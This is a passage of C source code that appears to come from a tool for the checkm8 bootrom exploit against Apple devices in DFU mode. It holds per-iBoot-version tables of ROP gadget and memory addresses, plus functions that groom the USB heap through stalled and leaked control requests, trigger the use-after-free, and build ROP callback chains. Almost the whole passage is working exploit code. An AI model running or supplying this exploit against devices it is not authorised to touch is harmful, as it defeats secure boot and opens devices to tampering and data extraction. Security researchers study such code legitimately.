config_overwrite_pad = 0x540;
tlbi = 0x100000444;
nop_gadget = 0x10000CD0C;
ret_gadget = 0x100000148;
patch_addr = 0x100007630;
ttbr0_addr = 0x1800A0000;
func_gadget = 0x10000CCEC;
write_ttbr0 = 0x1000003F4;
memcpy_addr = 0x100010950;
aes_crypto_cmd = 0x10000C994;
boot_tramp_end = 0x1800B0000;
ttbr0_vrom_off = 0x400;
ttbr0_sram_off = 0x600;
gUSBSerialNumber = 0x180083D28;
dfu_handle_request = 0x180088A58;
usb_core_do_transfer = 0x10000DD64;
dfu_handle_bus_reset = 0x180088A88;
insecure_memory_base = 0x1800B0000;
handle_interface_request = 0x10000E08C;
usb_create_string_descriptor = 0x10000D234;
usb_serial_number_string_descriptor = 0x18008062A;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-3332.0.0.1.23]") != NULL) {
cpid = 0x8015;
config_hole = 6;
config_overwrite_pad = 0x540;
tlbi = 0x1000004AC;
nop_gadget = 0x10000A9C4;
ret_gadget = 0x100000148;
patch_addr = 0x10000624C;
ttbr0_addr = 0x18000C000;
func_gadget = 0x10000A9AC;
write_ttbr0 = 0x10000045C;
memcpy_addr = 0x10000E9D0;
aes_crypto_cmd = 0x100009E9C;
boot_tramp_end = 0x18001C000;
ttbr0_vrom_off = 0x400;
ttbr0_sram_off = 0x600;
gUSBSerialNumber = 0x180003A78;
dfu_handle_request = 0x180008638;
usb_core_do_transfer = 0x10000B9A8;
dfu_handle_bus_reset = 0x180008668;
insecure_memory_base = 0x18001C000;
handle_interface_request = 0x10000BCCC;
usb_create_string_descriptor = 0x10000AE80;
usb_serial_number_string_descriptor = 0x1800008FA;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-3401.0.0.1.16]") != NULL) {
cpid = 0x8012;
config_hole = 6;
config_overwrite_pad = 0x540;
tlbi = 0x100000494;
nop_gadget = 0x100008DB8;
ret_gadget = 0x10000012C;
patch_addr = 0x100004854;
ttbr0_addr = 0x18000C000;
func_gadget = 0x100008DA0;
write_ttbr0 = 0x100000444;
memcpy_addr = 0x10000EA30;
aes_crypto_cmd = 0x1000082AC;
boot_tramp_end = 0x18001C000;
ttbr0_vrom_off = 0x400;
ttbr0_sram_off = 0x600;
gUSBSerialNumber = 0x180003AF8;
dfu_handle_request = 0x180008B08;
usb_core_do_transfer = 0x10000BD20;
dfu_handle_bus_reset = 0x180008B38;
insecure_memory_base = 0x18001C000;
handle_interface_request = 0x10000BFFC;
usb_create_string_descriptor = 0x10000B1CC;
usb_serial_number_string_descriptor = 0x18000082A;
}
if(cpid != 0) {
printf("CPID: 0x%" PRIX32 "\n", cpid);
*(bool *)pwned = strstr(usb_serial_num, pwnd_str) != NULL;
ret = true;
}
free(usb_serial_num);
}
return ret;
}
static bool
dfu_check_status(const usb_handle_t *handle, uint8_t status, uint8_t state) {
struct {
uint8_t status, poll_timeout[3], state, str_idx;
} dfu_status;
transfer_ret_t transfer_ret;
return send_usb_control_request(handle, 0xA1, DFU_GET_STATUS, 0, 0, &dfu_status, sizeof(dfu_status), &transfer_ret) && transfer_ret.ret == USB_TRANSFER_OK && transfer_ret.sz == sizeof(dfu_status) && dfu_status.status == status && dfu_status.state == state;
}
static bool
dfu_set_state_wait_reset(const usb_handle_t *handle) {
transfer_ret_t transfer_ret;
return send_usb_control_request_no_data(handle, 0x21, DFU_DNLOAD, 0, 0, 0, &transfer_ret) && transfer_ret.ret == USB_TRANSFER_OK && transfer_ret.sz == 0 && dfu_check_status(handle, DFU_STATUS_OK, DFU_STATE_MANIFEST_SYNC) && dfu_check_status(handle, DFU_STATUS_OK, DFU_STATE_MANIFEST) && dfu_check_status(handle, DFU_STATUS_OK, DFU_STATE_MANIFEST_WAIT_RESET);
}
static bool
checkm8_stage_reset(const usb_handle_t *handle) {
transfer_ret_t transfer_ret;
if(send_usb_control_request_no_data(handle, 0x21, DFU_DNLOAD, 0, 0, DFU_FILE_SUFFIX_LEN, &transfer_ret) && transfer_ret.ret == USB_TRANSFER_OK && transfer_ret.sz == DFU_FILE_SUFFIX_LEN && dfu_set_state_wait_reset(handle) && send_usb_control_request_no_data(handle, 0x21, DFU_DNLOAD, 0, 0, EP0_MAX_PACKET_SZ, &transfer_ret) && transfer_ret.ret == USB_TRANSFER_OK && transfer_ret.sz == EP0_MAX_PACKET_SZ) {
return true;
}
send_usb_control_request_no_data(handle, 0x21, DFU_CLR_STATUS, 0, 0, 0, NULL);
return false;
}
static bool
checkm8_stage_setup(const usb_handle_t *handle) {
unsigned usb_abort_timeout = usb_timeout - 1;
transfer_ret_t transfer_ret;
for(;;) {
if(send_usb_control_request_async_no_data(handle, 0x21, DFU_DNLOAD, 0, 0, DFU_MAX_TRANSFER_SZ, usb_abort_timeout, &transfer_ret) && transfer_ret.sz < config_overwrite_pad && send_usb_control_request_no_data(handle, 0, 0, 0, 0, config_overwrite_pad - transfer_ret.sz, &transfer_ret) && transfer_ret.ret == USB_TRANSFER_STALL) {
return true;
}
send_usb_control_request_no_data(handle, 0x21, DFU_DNLOAD, 0, 0, EP0_MAX_PACKET_SZ, NULL);
usb_abort_timeout = (usb_abort_timeout + 1) % (usb_timeout - usb_abort_timeout_min + 1) + usb_abort_timeout_min;
}
return false;
}
static bool
checkm8_usb_request_leak(const usb_handle_t *handle) {
transfer_ret_t transfer_ret;
return send_usb_control_request_async_no_data(handle, 0x80, 6, (3U << 8U) | device_descriptor.i_serial_number, USB_MAX_STRING_DESCRIPTOR_IDX, EP0_MAX_PACKET_SZ, 1, &transfer_ret) && transfer_ret.sz == 0;
}
static void
checkm8_stall(const usb_handle_t *handle) {
unsigned usb_abort_timeout = usb_timeout - 1;
transfer_ret_t transfer_ret;
for(;;) {
if(send_usb_control_request_async_no_data(handle, 0x80, 6, (3U << 8U) | device_descriptor.i_serial_number, USB_MAX_STRING_DESCRIPTOR_IDX, 3 * EP0_MAX_PACKET_SZ, usb_abort_timeout, &transfer_ret) && transfer_ret.sz < 3 * EP0_MAX_PACKET_SZ && checkm8_usb_request_leak(handle)) {
break;
}
usb_abort_timeout = (usb_abort_timeout + 1) % (usb_timeout - usb_abort_timeout_min + 1) + usb_abort_timeout_min;
}
}
static bool
checkm8_no_leak(const usb_handle_t *handle) {
transfer_ret_t transfer_ret;
return send_usb_control_request_async_no_data(handle, 0x80, 6, (3U << 8U) | device_descriptor.i_serial_number, USB_MAX_STRING_DESCRIPTOR_IDX, 3 * EP0_MAX_PACKET_SZ + 1, 1, &transfer_ret) && transfer_ret.sz == 0;
}
static bool
checkm8_usb_request_stall(const usb_handle_t *handle) {
transfer_ret_t transfer_ret;
return send_usb_control_request_no_data(handle, 2, 3, 0, 0x80, 0, &transfer_ret) && transfer_ret.ret == USB_TRANSFER_STALL;
}
static bool
checkm8_stage_spray(const usb_handle_t *handle) {
size_t i;
if(config_large_leak == 0) {
if(cpid == 0x7001 || cpid == 0x7000 || cpid == 0x7002 || cpid == 0x8003 || cpid == 0x8000) {
while(!checkm8_usb_request_stall(handle) || !checkm8_usb_request_leak(handle) || !checkm8_no_leak(handle)) {}
} else {
checkm8_stall(handle);
for(i = 0; i < config_hole; ++i) {
while(!checkm8_no_leak(handle)) {}
}
while(!checkm8_usb_request_leak(handle) || !checkm8_no_leak(handle)) {}
}
send_usb_control_request_no_data(handle, 0x21, DFU_CLR_STATUS, 0, 0, 3 * EP0_MAX_PACKET_SZ + 1, NULL);
} else {
for(i = 0; i < config_large_leak; ++i) {
while(!checkm8_usb_request_stall(handle)) {}
}
send_usb_control_request_no_data(handle, 0x21, DFU_CLR_STATUS, 0, 0, 0, NULL);
}
return true;
}
static size_t
usb_rop_callbacks(uint8_t *buf, uint64_t addr, const callback_t *callbacks, size_t callback_cnt) {
uint8_t block_0[MAX_BLOCK_SZ], block_1[MAX_BLOCK_SZ];
size_t i, j, sz = 0, block_0_sz, block_1_sz;
uint64_t reg;
for(i = 0; i < callback_cnt; i += 5) {
block_1_sz = block_0_sz = 0;
for(j = 0; j < 5; ++j) {
addr += MAX_BLOCK_SZ / 5;
if(j == 4) {
addr += MAX_BLOCK_SZ;
}
if(i + j < callback_cnt - 1) {
reg = func_gadget;
memcpy(block_0 + block_0_sz, ®, sizeof(reg));
block_0_sz += sizeof(reg);
reg = addr;
memcpy(block_0 + block_0_sz, ®, sizeof(reg));
block_0_sz += sizeof(reg);
reg = callbacks[i + j].arg;
memcpy(block_1 + block_1_sz, ®, sizeof(reg));
block_1_sz += sizeof(reg);
reg = callbacks[i + j].func;
memcpy(block_1 + block_1_sz, ®, sizeof(reg));
block_1_sz += sizeof(reg);
} else if(i + j == callback_cnt - 1) {
reg = func_gadget;
memcpy(block_0 + block_0_sz, ®, sizeof(reg));
block_0_sz += sizeof(reg);
reg = 0;
memcpy(block_0 + block_0_sz, ®, sizeof(reg));
block_0_sz += sizeof(reg);
reg = callbacks[i + j].arg;
memcpy(block_1 + block_1_sz, ®, sizeof(reg));
block_1_sz += sizeof(reg);
reg = callbacks[i + j].func;
memcpy(block_1 + block_1_sz, ®, sizeof(reg));
block_1_sz += sizeof(reg);
} else {
reg = 0;
memcpy(block_0 + block_0_sz, ®, sizeof(reg));
block_0_sz += sizeof(reg);
reg = 0;
memcpy(block_0 + block_0_sz, ®, sizeof(reg));
block_0_sz += sizeof(reg);
}
}
memcpy(buf + sz, block_0, block_0_sz);
sz += block_0_sz;
memcpy(buf + sz, block_1, block_1_sz);
sz += block_1_sz;
}
return sz;
}
static bool
dfu_send_data(const usb_handle_t *handle, uint8_t *data, size_t len) {
transfer_ret_t transfer_ret;
size_t i, packet_sz;
for(i = 0; i < len; i += packet_sz) {
packet_sz = MIN(len - i, DFU_MAX_TRANSFER_SZ);
if(!send_usb_control_request(handle, 0x21, DFU_DNLOAD, 0, 0, &data[i], packet_sz, &transfer_ret) || transfer_ret.ret != USB_TRANSFER_OK || transfer_ret.sz != packet_sz) {
return false;
}
}
return send_usb_control_request_no_data(handle, 0x21, DFU_DNLOAD, 0, 0, DFU_FILE_SUFFIX_LEN, &transfer_ret) && transfer_ret.ret == USB_TRANSFER_OK && transfer_ret.sz == DFU_FILE_SUFFIX_LEN && dfu_set_state_wait_reset(handle);
}
static bool
read_binary_file(const char *filename, uint8_t **buf, size_t *len) {
FILE *fp = fopen(filename, "rb");
bool ret = false;
if(fp != NULL) {
if(fseek(fp, 0, SEEK_END) == 0 && (*len = (size_t)ftell(fp)) != 0 && (*buf = malloc(*len)) != NULL) {
rewind(fp);
ret = fread(*buf, 1, *len, fp) == *len;
}
fclose(fp);